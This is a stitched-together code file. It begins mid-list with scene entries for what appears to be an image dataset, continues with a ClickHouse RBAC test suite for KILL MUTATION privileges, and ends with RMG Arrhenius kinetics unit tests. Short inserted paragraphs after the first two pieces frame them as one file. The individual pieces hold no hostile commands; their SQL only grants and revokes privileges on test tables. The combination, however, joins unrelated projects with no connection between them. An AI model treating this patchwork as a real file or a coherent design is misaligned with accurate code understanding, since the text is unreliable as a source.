scenes.append({"name": "ai_052_004", "archive_file": "AI52_004.7z.001", "asset_file": os.path.join("004", "AI52_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_005", "archive_file": "AI52_005.7z.001", "asset_file": os.path.join("005", "AI52_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_006", "archive_file": "AI52_006.7z.001", "asset_file": os.path.join("006", "AI52_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_007", "archive_file": "AI52_007.7z.001", "asset_file": os.path.join("007", "AI52_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_008", "archive_file": "AI52_008.7z.001", "asset_file": os.path.join("008", "AI52_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_009", "archive_file": "AI52_009.7z.001", "asset_file": os.path.join("009", "AI52_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_052_010", "archive_file": "AI52_010.7z.001", "asset_file": os.path.join("010", "AI52_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_001", "archive_file": "AI53_001.7z", "asset_file": os.path.join("AI53_001", "AI53_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_002", "archive_file": "AI53_002.7z", "asset_file": os.path.join("AI53_002", "AI53_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_003", "archive_file": "AI53_003.7z", "asset_file": os.path.join("AI53_003", "AI53_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_004", "archive_file": "AI53_004.7z", "asset_file": os.path.join("AI53_004", "AI53_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_005", "archive_file": "AI53_005.7z", "asset_file": os.path.join("AI53_005", "AI53_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_006", "archive_file": "AI53_006.7z", "asset_file": os.path.join("AI53_006", "AI53_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_007", "archive_file": "AI53_007.7z", "asset_file": os.path.join("AI53_007", "AI53_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_008", "archive_file": "AI53_008.7z", "asset_file": os.path.join("AI53_008", "AI53_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_009", "archive_file": "AI53_009.7z", "asset_file": os.path.join("AI53_009", "AI53_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_010", "archive_file": "AI53_010.7z", "asset_file": os.path.join("AI53_010", "AI53_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_011", "archive_file": "AI53_011.7z", "asset_file": os.path.join("AI53_011", "AI53_011"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_012", "archive_file": "AI53_012.7z", "asset_file": os.path.join("AI53_012", "AI53_012"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_013", "archive_file": "AI53_013.7z", "asset_file": os.path.join("AI53_013", "AI53_013"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_014", "archive_file": "AI53_014.7z", "asset_file": os.path.join("AI53_014", "AI53_014"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_015", "archive_file": "AI53_015.7z", "asset_file": os.path.join("AI53_015", "AI53_015"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_016", "archive_file": "AI53_016.7z", "asset_file": os.path.join("AI53_016", "AI53_016"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_017", "archive_file": "AI53_017.7z", "asset_file": os.path.join("AI53_017", "AI53_017"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_018", "archive_file": "AI53_018.7z", "asset_file": os.path.join("AI53_018", "AI53_018"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_019", "archive_file": "AI53_019.7z", "asset_file": os.path.join("AI53_019", "AI53_019"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_053_020", "archive_file": "AI53_020.7z", "asset_file": os.path.join("AI53_020", "AI53_020"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_001", "archive_file": "AI54_001.7z.001", "asset_file": os.path.join("001", "AI54_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_002", "archive_file": "AI54_002.7z.001", "asset_file": os.path.join("002", "AI54_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_003", "archive_file": "AI54_003.7z.001", "asset_file": os.path.join("003", "AI54_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_004", "archive_file": "AI54_004.7z.001", "asset_file": os.path.join("004", "AI54_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_005", "archive_file": "AI54_005.7z.001", "asset_file": os.path.join("005", "AI54_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_006", "archive_file": "AI54_006.7z.001", "asset_file": os.path.join("006", "AI54_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_007", "archive_file": "AI54_007.7z.001", "asset_file": os.path.join("007", "AI54_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_008", "archive_file": "AI54_008.7z.001", "asset_file": os.path.join("008", "AI54_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_009", "archive_file": "AI54_009.7z.001", "asset_file": os.path.join("009", "AI54_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_054_010", "archive_file": "AI54_010.7z.001", "asset_file": os.path.join("010", "AI54_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_001", "archive_file": "AI55_001.7z.001", "asset_file": os.path.join("001", "AI55_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_002", "archive_file": "AI55_002.7z.001", "asset_file": os.path.join("002", "AI55_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_003", "archive_file": "AI55_003.7z.001", "asset_file": os.path.join("003", "AI55_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_004", "archive_file": "AI55_004.7z.001", "asset_file": os.path.join("004", "AI55_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_005", "archive_file": "AI55_005.7z.001", "asset_file": os.path.join("005", "AI55_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_006", "archive_file": "AI55_006.7z.001", "asset_file": os.path.join("006", "AI55_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_007", "archive_file": "AI55_007.7z.001", "asset_file": os.path.join("007", "AI55_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_008", "archive_file": "AI55_008.7z.001", "asset_file": os.path.join("008", "AI55_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_009", "archive_file": "AI55_009.7z.001", "asset_file": os.path.join("009", "AI55_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_055_010", "archive_file": "AI55_010.7z.001", "asset_file": os.path.join("010", "AI55_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
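The registry above is a flat list of dicts keyed by `"name"`, so individual scenes can be selected before export. A minimal sketch of a lookup helper (`find_scene` is hypothetical, not part of the original export script), assuming the `scenes` list built above:

```python
def find_scene(scenes, name):
    """Return the first scene entry whose "name" matches, or None if absent."""
    for scene in scenes:
        if scene["name"] == name:
            return scene
    return None
```

This linear scan is adequate here because the registry is built once and is only a few hundred entries long; a dict keyed by name would be the natural choice if lookups were frequent.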
# Source: tests/testflows/rbac/tests/privileges/kill_mutation.py
# (ClickHouse, Apache-2.0 license)
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors

@TestSuite
def no_privilege(self, node=None):
    """Check that a user doesn't need any privileges to execute `KILL MUTATION` when there are no mutations."""
    if node is None:
        node = self.context.node

    with Scenario("kill mutation on a table"):
        user_name = f"user_{getuid()}"
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with user(node, user_name):
                with When("I grant the user NONE privilege"):
                    node.query(f"GRANT NONE TO {user_name}")

                with And("I grant the user USAGE privilege"):
                    node.query(f"GRANT USAGE ON *.* TO {user_name}")

                with Then("I attempt to kill mutation on table"):
                    node.query(
                        f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                        settings=[("user", user_name)],
                    )

    with Scenario("kill mutation on cluster"):
        user_name = f"user_{getuid()}"
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with user(node, user_name):
                with When("I grant the user NONE privilege"):
                    node.query(f"GRANT NONE TO {user_name}")

                with And("I grant the user USAGE privilege"):
                    node.query(f"GRANT USAGE ON *.* TO {user_name}")

                with Then("I attempt to kill mutation on cluster"):
                    node.query(
                        f"KILL MUTATION ON CLUSTER sharded_cluster WHERE database = 'default' AND table = '{table_name}'",
                        settings=[("user", user_name)],
                    )

@TestSuite
def privileges_granted_directly(self, node=None):
    """Check that a user is able to execute `KILL MUTATION` on a table with a mutation
    if and only if the user has the privilege matching the source of the mutation on that table.
    For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs the `ALTER UPDATE` privilege.
    """
    user_name = f"user_{getuid()}"

    if node is None:
        node = self.context.node

    with user(node, f"{user_name}"):
        Suite(test=update)(user_name=user_name, grant_target_name=user_name)
        Suite(test=delete)(user_name=user_name, grant_target_name=user_name)
        Suite(test=drop_column)(user_name=user_name, grant_target_name=user_name)

@TestSuite
def privileges_granted_via_role(self, node=None):
    """Check that a user is able to execute `KILL MUTATION` on a table with a mutation
    if and only if the user has the privilege matching the source of the mutation on that table.
    For example, to execute `KILL MUTATION` after `ALTER UPDATE`, the user needs the `ALTER UPDATE` privilege.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Suite(test=update)(user_name=user_name, grant_target_name=role_name)
        Suite(test=delete)(user_name=user_name, grant_target_name=role_name)
        Suite(test=drop_column)(user_name=user_name, grant_target_name=role_name)

@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterUpdate("1.0"))
def update(self, user_name, grant_target_name, node=None):
    """Check that the user is able to execute `KILL MUTATION` after `ALTER UPDATE`
    if and only if the user has `ALTER UPDATE` privilege.
    """
    exitcode, message = errors.not_enough_privileges(name=user_name)

    if node is None:
        node = self.context.node

    with Given("The user has no privilege"):
        node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

    with Scenario("KILL ALTER UPDATE without privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER UPDATE mutation"):
                node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")

            with When("I grant the user NONE privilege"):
                node.query(f"GRANT NONE TO {grant_target_name}")

            with And("I grant the user USAGE privilege"):
                node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER UPDATE with privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER UPDATE mutation"):
                node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")

            with When("I grant the ALTER UPDATE privilege"):
                node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )

    with Scenario("KILL ALTER UPDATE with revoked privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER UPDATE mutation"):
                node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")

            with When("I grant the ALTER UPDATE privilege"):
                node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")

            with And("I revoke the ALTER UPDATE privilege"):
                node.query(
                    f"REVOKE ALTER UPDATE ON {table_name} FROM {grant_target_name}"
                )

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER UPDATE with revoked ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER UPDATE mutation"):
                node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")

            with When("I grant the ALTER UPDATE privilege"):
                node.query(f"GRANT ALTER UPDATE ON {table_name} TO {grant_target_name}")

            with And("I revoke ALL privilege"):
                node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER UPDATE with ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER UPDATE mutation"):
                node.query(f"ALTER TABLE {table_name} UPDATE a = x WHERE 1")

            with When("I grant the ALL privilege"):
                node.query(f"GRANT ALL ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )

@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDelete("1.0"))
def delete(self, user_name, grant_target_name, node=None):
    """Check that the user is able to execute `KILL MUTATION` after `ALTER DELETE`
    if and only if the user has `ALTER DELETE` privilege.
    """
    exitcode, message = errors.not_enough_privileges(name=user_name)

    if node is None:
        node = self.context.node

    with Given("The user has no privilege"):
        node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

    with Scenario("KILL ALTER DELETE without privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DELETE mutation"):
                node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")

            with When("I grant the user NONE privilege"):
                node.query(f"GRANT NONE TO {grant_target_name}")

            with And("I grant the user USAGE privilege"):
                node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DELETE with privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DELETE mutation"):
                node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")

            with When("I grant the ALTER DELETE privilege"):
                node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )

    with Scenario("KILL ALTER DELETE with revoked privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DELETE mutation"):
                node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")

            with When("I grant the ALTER DELETE privilege"):
                node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")

            with And("I revoke the ALTER DELETE privilege"):
                node.query(
                    f"REVOKE ALTER DELETE ON {table_name} FROM {grant_target_name}"
                )

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DELETE with revoked ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DELETE mutation"):
                node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")

            with When("I grant the ALTER DELETE privilege"):
                node.query(f"GRANT ALTER DELETE ON {table_name} TO {grant_target_name}")

            with And("I revoke ALL privilege"):
                node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DELETE with ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DELETE mutation"):
                node.query(f"ALTER TABLE {table_name} DELETE WHERE 1")

            with When("I grant the ALL privilege"):
                node.query(f"GRANT ALL ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )
@TestSuite
@Requirements(RQ_SRS_006_RBAC_Privileges_KillMutation_AlterDropColumn("1.0"))
def drop_column(self, user_name, grant_target_name, node=None):
    """Check that the user is able to execute `KILL MUTATION` after `ALTER DROP COLUMN`
    if and only if the user has `ALTER DROP COLUMN` privilege.
    """
    exitcode, message = errors.not_enough_privileges(name=user_name)

    if node is None:
        node = self.context.node

    with Given("The user has no privilege"):
        node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

    with Scenario("KILL ALTER DROP COLUMN without privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DROP COLUMN mutation"):
                node.query(f"ALTER TABLE {table_name} DROP COLUMN x")

            with When("I grant the user NONE privilege"):
                node.query(f"GRANT NONE TO {grant_target_name}")

            with And("I grant the user USAGE privilege"):
                node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DROP COLUMN with privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DROP COLUMN mutation"):
                node.query(f"ALTER TABLE {table_name} DROP COLUMN x")

            with When("I grant the ALTER DROP COLUMN privilege"):
                node.query(
                    f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
                )

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )

    with Scenario("KILL ALTER DROP COLUMN with revoked privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DROP COLUMN mutation"):
                node.query(f"ALTER TABLE {table_name} DROP COLUMN x")

            with When("I grant the ALTER DROP COLUMN privilege"):
                node.query(
                    f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
                )

            with And("I revoke the ALTER DROP COLUMN privilege"):
                node.query(
                    f"REVOKE ALTER DROP COLUMN ON {table_name} FROM {grant_target_name}"
                )

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DROP COLUMN with revoked ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DROP COLUMN mutation"):
                node.query(f"ALTER TABLE {table_name} DROP COLUMN x")

            with When("I grant the ALTER DROP COLUMN privilege"):
                node.query(
                    f"GRANT ALTER DROP COLUMN ON {table_name} TO {grant_target_name}"
                )

            with And("I revoke ALL privilege"):
                node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                    exitcode=exitcode,
                    message="Exception: Not allowed to kill mutation.",
                )

    with Scenario("KILL ALTER DROP COLUMN with ALL privilege"):
        table_name = f"merge_tree_{getuid()}"

        with table(node, table_name):
            with Given("I have an ALTER DROP COLUMN mutation"):
                node.query(f"ALTER TABLE {table_name} DROP COLUMN x")

            with When("I grant the ALL privilege"):
                node.query(f"GRANT ALL ON *.* TO {grant_target_name}")

            with Then("I try to KILL MUTATION"):
                node.query(
                    f"KILL MUTATION WHERE database = 'default' AND table = '{table_name}'",
                    settings=[("user", user_name)],
                )
@TestFeature
@Requirements(
    RQ_SRS_006_RBAC_Privileges_KillMutation("1.0"),
    RQ_SRS_006_RBAC_Privileges_All("1.0"),
    RQ_SRS_006_RBAC_Privileges_None("1.0"),
)
@Name("kill mutation")
def feature(self, node="clickhouse1", stress=None, parallel=None):
    """Check the RBAC functionality of KILL MUTATION."""
    self.context.node = self.context.cluster.node(node)

    if parallel is not None:
        self.context.parallel = parallel
    if stress is not None:
        self.context.stress = stress

    Suite(run=no_privilege, setup=instrument_clickhouse_server_log)
    Suite(run=privileges_granted_directly, setup=instrument_clickhouse_server_log)
    Suite(run=privileges_granted_via_role, setup=instrument_clickhouse_server_log)
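The suites above all exercise the same rule: a user may `KILL MUTATION` for a mutation created by `ALTER DELETE`/`ALTER UPDATE`/`ALTER DROP COLUMN` only while currently holding the corresponding `ALTER` privilege on that table, and the check happens at kill time, so a revoked grant no longer authorizes the kill. A minimal toy model of that logic (illustrative only; these helper names are not ClickHouse APIs):

```python
# Toy in-memory model of the RBAC rule the scenarios above test.
grants = set()

def grant(user, privilege, table):
    grants.add((user, privilege, table))

def revoke(user, privilege, table):
    grants.discard((user, privilege, table))

def can_kill_mutation(user, mutation_privilege, table):
    # The check is made at KILL time, so a revoked grant no longer
    # authorizes killing the mutation it once allowed creating.
    return (user, mutation_privilege, table) in grants

grant("user0", "ALTER DELETE", "merge_tree_1")
assert can_kill_mutation("user0", "ALTER DELETE", "merge_tree_1")
revoke("user0", "ALTER DELETE", "merge_tree_1")
assert not can_kill_mutation("user0", "ALTER DELETE", "merge_tree_1")
```

This mirrors the "with privilege" / "with revoked privilege" scenario pairs: same user, same table, opposite outcomes depending only on the current grant set.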
#!/usr/bin/env python3
###############################################################################
# #
# RMG - Reaction Mechanism Generator #
# #
# Copyright (c) 2002-2019 Prof. William H. Green (whgreen@mit.edu), #
# Prof. Richard H. West (r.west@neu.edu) and the RMG Team (rmg_dev@mit.edu) #
# #
# Permission is hereby granted, free of charge, to any person obtaining a #
# copy of this software and associated documentation files (the 'Software'), #
# to deal in the Software without restriction, including without limitation #
# the rights to use, copy, modify, merge, publish, distribute, sublicense, #
# and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in #
# all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #
# DEALINGS IN THE SOFTWARE. #
# #
###############################################################################
"""
This script contains unit tests of the :mod:`rmgpy.kinetics.arrhenius` module.
"""

import math
import unittest

import numpy as np

import rmgpy.constants as constants
from rmgpy.kinetics.arrhenius import Arrhenius, ArrheniusEP, PDepArrhenius, MultiArrhenius, MultiPDepArrhenius


################################################################################
class TestArrhenius(unittest.TestCase):
    """
    Contains unit tests of the :class:`Arrhenius` class.
    """

    def setUp(self):
        """
        A function run before each unit test in this class.
        """
        self.A = 1.0e12
        self.n = 0.5
        self.Ea = 41.84
        self.T0 = 1.
        self.Tmin = 300.
        self.Tmax = 3000.
        self.comment = 'C2H6'
        self.arrhenius = Arrhenius(
            A=(self.A, "cm^3/(mol*s)"),
            n=self.n,
            Ea=(self.Ea, "kJ/mol"),
            T0=(self.T0, "K"),
            Tmin=(self.Tmin, "K"),
            Tmax=(self.Tmax, "K"),
            comment=self.comment,
        )
    def test_a_factor(self):
        """
        Test that the Arrhenius A property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.A.value_si * 1e6, self.A, delta=1e0)

    def test_n(self):
        """
        Test that the Arrhenius n property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.n.value_si, self.n, 6)

    def test_ea(self):
        """
        Test that the Arrhenius Ea property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.Ea.value_si * 0.001, self.Ea, 6)

    def test_temperature0(self):
        """
        Test that the Arrhenius T0 property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.T0.value_si, self.T0, 6)

    def test_temperature_min(self):
        """
        Test that the Arrhenius Tmin property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.Tmin.value_si, self.Tmin, 6)

    def test_temperature_max(self):
        """
        Test that the Arrhenius Tmax property was properly set.
        """
        self.assertAlmostEqual(self.arrhenius.Tmax.value_si, self.Tmax, 6)

    def test_comment(self):
        """
        Test that the Arrhenius comment property was properly set.
        """
        self.assertEqual(self.arrhenius.comment, self.comment)

    def test_is_temperature_valid(self):
        """
        Test the Arrhenius.is_temperature_valid() method.
        """
        Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        # Use the builtin bool: np.bool was deprecated and removed in NumPy >= 1.24.
        validdata = np.array([False, True, True, True, True, True, True, True, True, True], bool)
        for T, valid in zip(Tdata, validdata):
            valid0 = self.arrhenius.is_temperature_valid(T)
            self.assertEqual(valid0, valid)

    def test_get_rate_coefficient(self):
        """
        Test the Arrhenius.get_rate_coefficient() method.
        """
        Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        kexplist = np.array(
            [1.6721e-4, 6.8770e1, 5.5803e3, 5.2448e4, 2.0632e5, 5.2285e5, 1.0281e6, 1.7225e6, 2.5912e6, 3.6123e6])
        for T, kexp in zip(Tlist, kexplist):
            kact = self.arrhenius.get_rate_coefficient(T)
            self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
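The expected values in `kexplist` follow directly from the modified Arrhenius expression k(T) = A (T/T0)^n exp(-Ea/RT), evaluated in SI units. A standalone sketch (no `rmgpy` dependency; the defaults mirror the fixture above after converting A = 1e12 cm^3/(mol*s) to 1e6 m^3/(mol*s) and Ea = 41.84 kJ/mol to 41840 J/mol):

```python
import math

R = 8.314462618  # gas constant, J/(mol*K)

def arrhenius_k(T, A=1.0e6, n=0.5, Ea=41840.0, T0=1.0):
    """Modified Arrhenius expression k(T) = A * (T/T0)**n * exp(-Ea/(R*T))."""
    return A * (T / T0) ** n * math.exp(-Ea / (R * T))

# Reproduces the expected value at 1000 K from kexplist above (2.0632e5).
k = arrhenius_k(1000.0)
assert abs(k - 2.0632e5) < 1e-3 * 2.0632e5
```

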